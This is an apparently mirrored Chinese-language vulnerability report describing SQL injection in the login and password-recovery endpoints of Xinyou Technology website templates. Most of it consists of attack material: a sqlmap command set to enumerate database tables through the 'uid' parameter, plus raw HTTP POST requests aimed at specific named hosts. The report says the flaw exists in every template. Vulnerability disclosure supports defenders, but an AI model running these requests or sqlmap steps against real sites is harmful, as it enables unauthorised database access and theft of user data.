VULHUB ™

### 简要描述： 信游科技各大模板多处SQL注入漏洞，所有模板，均存在相应漏洞 ### 详细说明： 1.用户登录处未对用户名uid进行过滤，导致SQL注入 为避免影响，以测试站点为例： [<img src="https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg" alt="sqltest3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg) ``` sqlmap.py -r "C:\1.txt" -p "uid" --tables ``` ``` POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1 Host: xy003.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://xy003.52xinyou.cn/index.html Content-Length: 28 Cookie: xinyoukeji=2055191 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache uid=test&pwd=12345&rem=false ``` [<img...

### 简要描述： 信游科技各大模板多处SQL注入漏洞，所有模板，均存在相应漏洞 ### 详细说明： 1.用户登录处未对用户名uid进行过滤，导致SQL注入 为避免影响，以测试站点为例： [<img src="https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg" alt="sqltest3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg) ``` sqlmap.py -r "C:\1.txt" -p "uid" --tables ``` ``` POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1 Host: xy003.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://xy003.52xinyou.cn/index.html Content-Length: 28 Cookie: xinyoukeji=2055191 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache uid=test&pwd=12345&rem=false ``` [<img src="https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg" alt="sqltest2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg) 2.忘记密码处,用户账户同样存在这个问题 ``` POST /api/webaction.ashx HTTP/1.1 Host: xy006.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://xy006.52xinyou.cn/user/findpass.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 152 posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4 ``` [<img src="https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg" alt="sqltest1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg" alt="sqltest2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg) [<img src="https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg" alt="sqltest1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg)